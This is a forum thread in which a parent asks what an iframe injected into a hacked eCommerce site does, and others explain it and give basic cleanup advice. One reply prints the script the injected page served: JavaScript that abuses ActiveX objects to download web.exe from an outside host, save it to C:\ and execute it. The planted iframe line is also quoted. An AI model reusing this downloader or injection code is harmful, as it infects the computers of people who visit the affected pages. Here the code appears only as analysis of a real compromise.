Topic: Hacked Site : What does this code do ?

[malcsenior]

My daughters website, eCommerce based, has been hacked and the following line was inserted in her home (html) page and index (php) page:

<iframe src='http://ns192168-ip255.net/traffic/index.php' width=1
height=1></iframe>

What does it do and who did it ?

Pages are now read only any other security advice would be appreciated.

[Drumminxx]

its an inline frame very common among people who want to insert another web page into your page.

you can just delete what you have posted

as far as security goes and assuming that your site is written in php you can use strip_tags() which will remove all the html from a string that was submitted.

but if it was not submitted through a post action and the site was actually hacked into, then you just may want to change your password to get access to the site

[Yojance]

An Iframe is like inserting a page into another one. It basicly adds a a scrollable page inside another page.
In this case, from what I can see, it has a 1 by 1 pixel size so it should display something small, but I can also see that from my understanding is safe to remove the line.
Hope this help, and wait for advise from the experts

[malcsenior]

Thanks so far, I understand the iframe tag, but what does the links to ns192168-ip255.net/traffic/index.php do, is it feeding information to another server ?

[corbin]

Code: [Select]

var obj_RDS = document.createElement('object');
obj_RDS.setAttribute('id','obj_RDS');
obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var obj_msxml2 = obj_RDS.CreateObject("msxml2.XMLHTTP","");
obj_msxml2.open("GET","http://ns192168-ip255.net/traffic/web.exe",false);
obj_msxml2.send();
var obj_ShellApp = obj_RDS.CreateObject("Shell.Application","");
var obj_adodb = obj_RDS.CreateObject("adodb.stream","");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\246172160121.exe";
obj_adodb.SaveToFile(fn,2);
obj_ShellApp.ShellExecute(fn);
was in the page that was inserted... So from what i gather it was downloading http://ns192168-ip255.net/traffic/web.exe to what ever computer viewed that page and saving it as to the local computer as C:\246...exe

[corbin]

Whoa, I just rewent to that site intending to analyze what it does farther, and the source code of it has been changed  .  Now that page just does nothing... It calls an Iframe to a non existing site... You should still remove the iframe code from your daughters page though, and check on your computer for a wierd file on the top of the C drive named <random numbers>.exe

[Drumminxx]

yea now it has this

http://aaaafffffdddd.net

which is obviously not a real site

[corbin]

Its odd how the page was changed about 3 seconds after i looked at it....

[redarrow]

theres a .exe application running that code check the .exe name and exstention in the windows search see what you get.

[shoz]

Pages are now read only any other security advice would be appreciated.

Securing your site is something that requires more than using a few tips here and there. I'll give a few however.

I am not a security expert, but If the site's scripts are self written then you can start by read this Security Guide.

If this is a third party script, then you'll want to keep up on updates. You'll also want to search regularly to see if there are any known vulnerabilities for the script at a site such as http://www.securityfocus.com.

Having already been compromised, you may want to do the following things

1) Take the site down

2) Find out how the site was originally compromised. If you don't know then it's likely that it will happen again.

3) Depending on the level of access gained, you may want to change passwords for the databases,ftp,control panel etc. The associated email addresses should also possibly have their paswords changed if they are the same as any of the others.

You should be able to find sites that deal with (or have sections dealing with) overall security specifically, to get more opinions.

This doesn't have much to do with a PHP script you're writing so I've moved it to the Miscellaneous forum.

[malcsenior]

Thanks for putting this thread in the right place.
I am in the very early stages of php, you guys are mega cool and thanks for your advice so far.
Really appreciated.

The tricky line of code was removed, immediately it was spotted, all computers have been checked. both by virus, mallware tools and searching C; root. Macs have been used to check all tricky links as they are resistant to PC hacks. Will take all your advice onboard.

[Mr.x]

That is the craziest thing i've seen all day!

Wonder what that program ran? If you havn't already make sure you can your computer and also try running some network security programs to check your computer for any newly opened ports? Make sure you have a firewall aswell.

Another security tip is to contact the hosting company. If you don't have access to the logs they do.

See if there was an unauthorized FTP login or if it was a vunlernability in eCommerce. You should also contact eCommerce because it is their responsibility to ensure their scripts are safe, especially when dealing with funds and sales.